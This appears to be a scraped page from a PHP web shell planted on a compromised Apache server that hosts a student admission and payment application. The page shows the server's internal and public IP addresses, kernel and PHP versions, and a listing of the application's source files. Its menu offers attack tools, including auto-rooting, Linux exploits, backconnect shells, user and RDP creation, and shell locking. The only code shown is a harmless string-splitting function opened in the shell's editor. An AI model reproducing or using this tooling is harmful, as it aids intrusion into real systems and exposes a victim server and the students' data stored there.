Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.119.139.90
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
student /
sikkim /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
Thumbs.db
19
KB
-rwxr-xr-x
applicationFormReportNEFT.php
39.95
KB
-rwxr-xr-x
applicationFormReportNEFT22.ph...
21.49
KB
-rwxr-xr-x
applicationFormReportNETBANKIN...
18.3
KB
-rwxr-xr-x
applicationFormReportPOSTOFFIC...
18.13
KB
-rwxr-xr-x
applicationFormReportSBM.php
17.02
KB
-rwxr-xr-x
candidate_list.php
64.47
KB
-rwxr-xr-x
candidate_list25.php
49.9
KB
-rwxr-xr-x
candidate_list_1112019.php
50.96
KB
-rwxr-xr-x
candidate_list_17092018.php
50.43
KB
-rwxr-xr-x
candidate_list_before_paygate....
43.83
KB
-rwxr-xr-x
cappcontext.php
3.19
KB
-rwxr-xr-x
cappdu.php
3.53
KB
-rwxr-xr-x
code39.php
6.38
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
516
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
customappcontext.php
2.34
KB
-rwxr-xr-x
download_upload.html
2.6
KB
-rwxr-xr-x
ean13.php
2.83
KB
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
mregistry.php
1.57
KB
-rwxr-xr-x
mregistry_before_paygate.php
1.17
KB
-rwxr-xr-x
mregistry_before_postoffice.ph...
1.04
KB
-rwxr-xr-x
razorpay_order_api.php
24.07
KB
-rw-rw-r--
report_admission_ticket.php
51.49
KB
-rwxr-xr-x
report_admission_ticket2211201...
34.94
KB
-rwxr-xr-x
report_admission_ticket_080620...
46.64
KB
-rwxr-xr-x
report_admission_ticket_bf_cov...
46.96
KB
-rwxr-xr-x
report_hall_ticket.php
11.36
KB
-rwxr-xr-x
report_hall_ticketold.php
11.36
KB
-rwxr-xr-x
revaluation.php
17.12
KB
-rwxr-xr-x
rotation.php
596
B
-rwxr-xr-x
stringspliter.php
693
B
-rwxr-xr-x
student.php
4.75
KB
-rwxr-xr-x
subjectfreez.php
12.99
KB
-rwxr-xr-x
verifiedlistReport.php
7.01
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stringspliter.php
<?php function str_splitf($longString,$maxLineLength) { $arrayWords = explode(' ', $longString); // Max size of each line //$maxLineLength = 30; // Auxiliar counters, foreach will use them $currentLength = 0; $index = 0; foreach($arrayWords as $word) { // +1 because the word will receive back the space in the end that it loses in explode() $wordLength = strlen($word) + 1; if( ( $currentLength + $wordLength ) <= $maxLineLength ) { $arrayOutput[$index] .= $word . ' '; $currentLength += $wordLength; } else { $index += 1; $currentLength = $wordLength; $arrayOutput[$index] = $word; } } return $arrayOutput; } ?>
Close